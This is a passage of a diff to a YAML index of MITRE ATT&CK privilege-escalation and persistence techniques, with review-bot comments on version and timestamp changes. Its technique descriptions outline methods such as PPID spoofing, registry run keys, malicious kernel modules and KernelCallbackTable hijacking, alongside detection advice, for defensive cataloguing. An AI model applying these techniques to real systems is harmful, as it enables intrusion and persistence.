July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -24182,9 +24510,6 @@ privilege-escalation:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.001
atomic_tests: []
T1134.003:
@@ -24248,7 +24573,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.003:
technique:
@@ -24337,7 +24661,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.003
atomic_tests: []
T1134.004:
@@ -24395,7 +24718,7 @@ privilege-escalation:
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe
rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe
), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-03T02:15:42.360Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Access Token Manipulation: Parent PID Spoofing'
x_mitre_detection: |-
@@ -24420,12 +24743,11 @@ privilege-escalation:
- Host Forensic Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.004
atomic_tests: []
T1546.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:27:11.065Z'
name: 'Event Triggered Execution: Change Default File Association'
description: "Adversaries may establish persistence by executing malicious content
triggered by a file type association. When a file is opened, the default program
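Review bot: T1134.004 keeps `x_mitre_attack_spec_version: 2.1.0` after this change while the neighbouring objects are at 3.1.0 or 3.2.0, and T1055.014 and T1546.014 below stay at 2.1.0 as well. That mix is what upstream ships for objects that have not been touched since, so it is not wrong, but if the index is expected to be uniform per release the PR description should say that the per-object values are carried through as-is.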
@@ -24451,7 +24773,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
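Review bot: `x_mitre_attack_spec_version: 2.1.0` is deleted from T1546.001 here and `x_mitre_modified_by_ref` in the next hunk, and both are re-added at the bottom of the object in a later hunk with the spec version at 3.2.0. The effective change is therefore a bump from 2.1.0 to 3.2.0 plus the new `modified` value of 2024-09-12, while `x_mitre_version` stays at 1.0, which is consistent with a reference-only refresh; it would be clearer if the generator kept these keys in one place so the bump shows up as a one-line edit.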
@@ -24465,7 +24786,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -24492,8 +24812,8 @@ privilege-escalation:
url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
- source_name: Microsoft File Handlers
description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
- Retrieved November 13, 2014.
- url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+ Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
- source_name: Microsoft Assoc Oct 2017
description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
7, 2018.
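Review bot: the `Microsoft File Handlers` reference moves from a plain-http msdn.microsoft.com URL to an https learn.microsoft.com "previous-versions" page with an updated retrieval date, and the `source_name` key is unchanged so existing `(Citation: Microsoft File Handlers)` markers still resolve. The `Microsoft Run Key` reference further down gets the same http-to-https refresh. Both are fine; the only thing to verify is that the learn.microsoft.com page carries the same content the original citation was made for, since it is a VS2015 archive rather than the current docs.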
@@ -24504,7 +24824,8 @@ privilege-escalation:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.001
atomic_tests: []
T1055.014:
@@ -24575,7 +24896,7 @@ privilege-escalation:
resources, and possibly elevated privileges. Execution via VDSO hijacking
may also evade detection from security products since the execution is masked
under a legitimate process. "
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-07T17:09:09.048Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: VDSO Hijacking
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -24602,7 +24923,6 @@ privilege-escalation:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.014:
technique:
@@ -24642,7 +24962,7 @@ privilege-escalation:
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients
, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist
.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T00:16:01.732Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Emond'
x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -24662,12 +24982,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.014
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -24721,11 +25040,10 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547.001:
technique:
- modified: '2023-10-16T09:08:22.319Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
description: |-
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -24812,9 +25130,9 @@ privilege-escalation:
in the Registry. Retrieved August 3, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Oddvar Moe RunOnceEx Mar 2018
description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
from Autoruns.exe. Retrieved June 29, 2018.
@@ -24827,12 +25145,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.001
atomic_tests: []
T1098:
technique:
- modified: '2024-01-16T22:24:38.234Z'
+ modified: '2024-10-15T15:35:57.382Z'
name: Account Manipulation
description: "Adversaries may manipulate accounts to maintain and/or elevate
access to victim systems. Account manipulation may consist of any action that
@@ -24868,16 +25185,15 @@ privilege-escalation:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- SaaS
- Network
- Containers
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
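Review bot: T1098 loses three platform names at once (`Azure AD`, `Office 365`, `Google Workspace`) and gains `Office Suite` and `Identity Provider`, with the version going 2.6 to 2.7. Any index or filter that still selects on the removed names will no longer match this technique, so either the generator needs a mapping from old to new platform names or the downstream per-platform outputs need to be regenerated together with this file; please call that out in the PR description.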
@@ -24918,143 +25234,141 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098
atomic_tests: []
T1547.006:
technique:
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-12T17:30:54.170Z'
+ name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+ description: |-
+ Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
+
+ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+ Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+ Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+ Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
- Anastasios Pingios
- Jeremy Galloway
- Red Canary
- Eric Kaiser @ideologysec
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: |
+ Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+
+ On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'File: File Creation'
+ - 'File: File Modification'
+ - 'Kernel: Kernel Module Load'
+ - 'Process: Process Creation'
+ x_mitre_permissions_required:
+ - root
type: attack-pattern
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
created: '2020-01-24T17:42:23.339Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1547.006
url: https://attack.mitre.org/techniques/T1547/006
+ external_id: T1547.006
- source_name: Apple Developer Configuration Profile
- url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
September 23, 2021.
+ url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
- source_name: Apple Kernel Extension Deprecation
- url: https://developer.apple.com/support/kernel-extensions/
description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
Alternatives. Retrieved November 4, 2020.
+ url: https://developer.apple.com/support/kernel-extensions/
- source_name: System and kernel extensions in macOS
- url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
March 31, 2022.
+ url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
- source_name: GitHub Reptile
- url: https://github.com/f0rb1dd3n/Reptile
description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
April 9, 2018.
+ url: https://github.com/f0rb1dd3n/Reptile
- source_name: Volatility Phalanx2
- url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+ url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
- source_name: iDefense Rootkit Overview
- url: http://www.megasecurity.org/papers/Rootkits.pdf
description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
- April 6, 2018.
+ September 12, 2024.
+ url: https://www.megasecurity.org/papers/Rootkits.pdf
- source_name: Linux Loadable Kernel Module Insert and Remove LKMs
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
+ url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
- source_name: CrowdStrike Linux Rootkit
- url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
Retrieved December 21, 2017.
+ url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
- source_name: GitHub Diamorphine
- url: https://github.com/m0nad/Diamorphine
description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+ url: https://github.com/m0nad/Diamorphine
- source_name: Securelist Ventir
- url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
+ url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
- source_name: User Approved Kernel Extension Pike’s
- url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
Loading…. Retrieved September 23, 2021.
+ url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
- source_name: Linux Kernel Module Programming Guide
- url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
Retrieved April 6, 2018.
+ url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
- source_name: Linux Kernel Programming
- url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
+ url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
- source_name: Trend Micro Skidmap
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
Retrieved June 4, 2020.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
- source_name: Purves Kextpocalypse 2
- url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
. Retrieved September 23, 2021.
+ url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
- source_name: RSAC 2015 San Francisco Patrick Wardle
- url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
Retrieved April 6, 2018.
+ url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Synack Secure Kernel Extension Broken
- url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
Extension Loading’ is Broken. Retrieved April 6, 2018.
+ url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
- source_name: Wikipedia Loadable Kernel Module
- url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
April 9, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
-
- When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
- Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
- Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
- Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
- x_mitre_detection: |
- Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
- Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
-
- On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'File: File Creation'
- - 'File: File Modification'
- - 'Kernel: Kernel Module Load'
- - 'Process: Process Creation'
- x_mitre_permissions_required:
- - root
- x_mitre_attack_spec_version: 2.1.0
+ url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.006
atomic_tests:
- name: Linux - Load Kernel Module via insmod
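Review bot: the removed block at the top of this hunk deletes T1547.006's `x_mitre_detection`, `kill_chain_phases` (persistence and privilege-escalation), `x_mitre_is_subtechnique`, `x_mitre_data_sources` and `x_mitre_permissions_required`, while the only additions are `url`, `object_marking_refs` and `x_mitre_attack_spec_version: 3.2.0`. If this is a key reorder the replacement copies sit outside this hunk; please confirm they are present, because this section of the file is keyed on tactic and a technique without `kill_chain_phases` would not be listed under privilege-escalation. Also confirm that the added `url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux` line attaches to the "Wikipedia Loadable Kernel Module" external reference and not to the top level of the object, since the indentation of a lone `url` key after a block deletion is hard to read in the diff.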
@@ -25138,7 +25452,7 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
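Review bot: `modified` for the KernelCallbackTable technique moves backwards, from '2022-05-11T14:00:00.188Z' to '2022-03-22T15:47:33.915Z', which is not what regenerating from a newer ATT&CK bundle should produce. The same regression recurs throughout this diff for objects whose old stamp ends in 14:00:00.188Z, so the index appears to have been rebuilt from a bundle that dropped a bulk re-stamp rather than from newer data. Please state the exact STIX bundle version in the commit message, or confirm that the older value is what upstream currently publishes for these objects.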
@@ -25164,12 +25478,10 @@ privilege-escalation:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
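Review bot: at `- spec_version: '2.1'` and `- x_mitre_attack_spec_version: 2.1.0` the KernelCallbackTable object loses its ATT&CK spec version entirely, with nothing added in its place, whereas most other objects in this diff are carried to `x_mitre_attack_spec_version: 3.2.0`. Either re-add the field here or document why some techniques carry no spec version after this change; consumers that branch on that key will otherwise see a mix of 3.2.0 and absent values.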
@@ -25247,9 +25559,8 @@ privilege-escalation:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests:
- name: Create Systemd Service and Timer
@@ -25427,7 +25738,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.005:
technique:
@@ -25501,11 +25811,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
